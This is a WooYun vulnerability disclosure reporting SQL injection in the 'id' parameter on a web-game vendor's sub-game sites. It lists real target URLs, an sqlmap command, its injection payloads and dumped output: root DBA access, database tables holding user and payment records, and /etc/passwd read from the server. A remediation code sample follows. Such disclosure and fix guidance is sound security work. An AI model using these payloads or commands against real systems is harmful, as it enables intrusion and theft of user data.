
Vulnerability summary

Defect ID: wooyun-2015-0144449

Title: SQL injection in the same parameter across all sub-games of a web game (DBA privileges + hundreds of thousands of user records exposed + arbitrary file read)

Vendor: 爱游乐

Author: 路人甲

Submitted: 2015-10-02 10:57

Fix deadline: 2015-11-16 10:58

Published: 2015-11-16 10:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-02: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-16: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The same parameter is injectable on every sub-game.

Detailed description:

Injection points, for example:

http://zxy.iy6.cn/?action=detail&id=85
http://jjsg.iy6.cn/?action=detail&id=4825
http://xyfm.iy6.cn/?action=detail&id=2935
http://wj.iy6.cn/?action=detail&id=3581
http://rxhzw.iy6.cn/?action=detail&id=26
http://wj2.iy6.cn/?action=detail&id=3226
http://smsg.iy6.cn/?action=detail&id=2946
……


There are many more; taking the first one as an example:
http://zxy.iy6.cn/?action=detail&id=85
Tested with sqlmap:

sqlmap.py -u "http://zxy.iy6.cn/?action=detail&id=85" --dbms "MySQL" --current-db --current-user --is-dba --hostname


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=detail&id=85) AND 9543=9543 AND (7966=7966
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: action=detail&id=-8903) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71776a6971,0x484e58444e4164536669,0x7167737171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: action=detail&id=85) AND SLEEP(5) AND (3740=3740
---
[19:50:14] [INFO] testing MySQL
[19:50:14] [INFO] confirming MySQL
[19:50:14] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[19:50:14] [INFO] fetching current user
current user: 'root@localhost'
[19:50:15] [INFO] fetching current database
current database: 'iy6'
[19:50:15] [INFO] fetching server hostname
hostname: 'localhost.localdomain'
[19:50:15] [INFO] testing if current user is DBA
[19:50:15] [INFO] fetching current user
current user is DBA: True
database management system users [6]:
[*] ''@'localhost.localdomain'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'c65mini.localdomain'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
available databases [7]:
[*] information_schema
[*] iy6
[*] mysql
[*] performance_schema
[*] qihihi
[*] qq990test
[*] test
Database: qq990test
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| kmy_member | 527473 | over 500,000 users
| kmy_member_login_game_record | 106896 | over 100,000 login records
| kmy_z_game_card | 48793 | tens of thousands of game cards
| kmy_z_card_record | 32676 |
| kmy_operationlog | 9329 |
| kmy_game_charge_record | 5497 |
| kmy_game_server | 5235 |
| kmy_pay_record | 4916 | thousands of payment records
| kmy_news | 3359 |
| kmy_platform_money_record | 3060 |
| kmy_access | 1582 |
| kmy_kaifu | 1263 |
| kmy_loginlog | 798 | login records
| kmy_menu | 635 |
| kmy_fail_charge | 336 |
| kmy_member_copy | 204 |
| kmy_game_charge_retry | 201 |
| kmy_z_card_type | 199 |
| kmy_z_charge_record | 131 |
| kmy_z_charge_username | 130 |
| kmy_tg_link | 121 |
| kmy_findpwd_record | 86 | password recovery records
| kmy_game_pic | 77 |
| kmy_game | 67 |
| kmy_game_leftmenu | 47 |
| kmy_friend_link | 33 |
| kmy_pay_type | 23 |
| kmy_faq | 22 |
| kmy_user | 15 | admin users
| kmy_pic | 13 |
| kmy_cache | 9 |
| kmy_single_page | 8 |
| kmy_role | 6 |
| kmy_tg_member | 4 | promoter members
| kmy_notification | 2 |
| kmy_config | 1 |
+---------------------------------+---------+
Database: iy6
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| kmy_z_game_card | 66960 | some 60,000 game cards
| kmy_member_login_game_record | 31457 |
| kmy_member | 19818 | nearly 20,000 users
| kmy_operationlog | 17571 |
| kmy_pay_record | 14445 | over 10,000 payment records
| kmy_game_charge_record | 9640 |
| kmy_z_card_record | 6665 |
| kmy_news | 4562 |
| kmy_game_server | 4298 |
| kmy_kaifu | 3927 |
| kmy_platform_money_record | 2939 |
| kmy_member_server_rolename | 2741 |
| kmy_access | 1825 |
| kmy_z_charge_username | 1722 |
| kmy_z_charge_record | 1525 |
| kmy_loginlog | 1374 | login records
| kmy_menu | 849 |
| kmy_tg_link | 628 |
| kmy_game_pic | 193 |
| kmy_z_card_type | 135 |
| kmy_game | 94 |
| kmy_game_leftmenu | 81 |
| kmy_findpwd_record | 51 |
| kmy_friend_link | 51 |
| kmy_game_charge_retry | 44 |
| kmy_tg_memberlink_change_record | 41 |
| kmy_tg_member | 32 | promoter users
| kmy_faq | 21 |
| kmy_pay_type | 19 |
| kmy_user | 18 | admin users
| kmy_pic | 13 |
| kmy_cache | 9 |
| kmy_single_page | 8 |
| kmy_role | 5 |
| kmy_notification | 2 |
| kmy_config | 1 |
+---------------------------------+---------+
Database: qihihi
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| pre_userplaygamelog | 1393154 | over a million user play records
| pre_z_game_card | 112471 | over 100,000 game cards
| pre_user | 81905 | over 80,000 users
| pre_userpingtaibilog | 37335 | over 30,000 platform-currency records
| pre_card | 25281 |
| pre_payorder | 23073 |
| pre_longnews | 12900 |
| pre_gameserver | 7435 |
| pre_kaifubiao | 6651 |
| pre_news | 6149 |
| pre_z_fail_charge | 5214 |
| pre_log | 3687 |
| pre_longplus | 2657 |
| pre_usergetpwdlog | 1361 |
| pre_paytoolog | 1209 |
| pre_z_charge_username | 513 |
| pre_z_charge_record | 496 |
| pre_longnewstype | 375 |
| pre_z_card_type | 233 |
| pre_longplustype | 205 |
| pre_game | 93 |
| pre_plus | 32 |
| pre_longplustype_copy | 29 |
| pre_role_user | 24 |
| pre_paytype | 22 |
| pre_link | 21 |
| pre_node | 16 |
| pre_adminuser | 13 | administrator users
| pre_access | 11 |
| pre_plustype | 9 |
| pre_userpingtaibilogtype | 6 |
| pre_adminaddpingtaibilog | 5 |
| pre_gameserverstatus | 5 |
| pre_ads | 4 |
| pre_role | 4 |
| pre_cpsurl | 3 | ?
| pre_newstype | 2 |
| pre_adstype | 1 |
| pre_cpsuser | 1 | super administrator?
| pre_linktype | 1 |
+---------------------------------+---------+
Database: mysql
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| help_relation | 1092 |
| help_topic | 535 |
| help_keyword | 487 |
| help_category | 40 |
| `user` | 6 |
| db | 2 |
| proxies_priv | 2 |
+---------------------------------+---------+


[Screenshots: 1.jpg, 2.jpg, 3.jpg]


Arbitrary file read (contents of /etc/passwd):

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
nginx:x:498:499::/home/nginx:/bin/bash
mysql:x:500:500::/home/mysql:/sbin/nologin

Proof of vulnerability:

[Screenshots: 1.jpg, 2.jpg, 3.jpg]

Fix recommendation:

Filter and validate the parameter
Restrict database privileges
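As an added illustration of the first fix (example code, not from the report or the vendor), the snippet below contrasts a detail lookup built by string concatenation, which the boolean-based payload above exploits, with the remediated version that validates id as a plain integer and binds it as a query parameter. It uses Python's sqlite3 in-memory database as a stand-in for MySQL; the table name, columns and rows are constructed, and the parenthesised WHERE clause is assumed from the shape of the sqlmap payloads.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the game "detail" table; the real schema is not on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE detail (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO detail VALUES (?, ?)",
                     [(85, "item-85"), (86, "item-86"), (4825, "item-4825")])
    return conn


def detail_vulnerable(conn, raw_id):
    # The query is assembled by string concatenation. The parentheses mirror the
    # shape sqlmap inferred above, where the payload closes one and reopens one.
    sql = "SELECT id, title FROM detail WHERE (id=" + raw_id + ")"
    return conn.execute(sql).fetchall()


def detail_fixed(conn, raw_id):
    # Fix 1 (filtering): accept only an ASCII decimal integer of sane length and
    # reject anything else before it gets anywhere near the database.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("invalid id")
    # Fix 2: pass the value as a bound parameter, so it is data, never SQL text.
    sql = "SELECT id, title FROM detail WHERE (id=?)"
    return conn.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Boolean-based blind payload from the report: a true and a false condition
    # produce different responses on the vulnerable query ...
    true_case = "85) AND 9543=9543 AND (7966=7966"
    false_case = "85) AND 9543=9544 AND (7966=7966"
    print(detail_vulnerable(db, true_case))   # [(85, 'item-85')]
    print(detail_vulnerable(db, false_case))  # []
    # ... while the fixed handler rejects the payload outright.
    try:
        detail_fixed(db, true_case)
    except ValueError as err:
        print("rejected:", err)
```

The second fix is a database-side matter the snippet cannot show: the application should not connect as root (sqlmap reports 'root@localhost' with DBA rights), and the account it does use should have neither the FILE privilege that LOAD_FILE needs for reads such as /etc/passwd nor access to the other databases listed.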

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability responses

Vendor response:

The vendor could not be contacted, or the vendor actively refused

Vulnerability Rank: 20 (WooYun rating)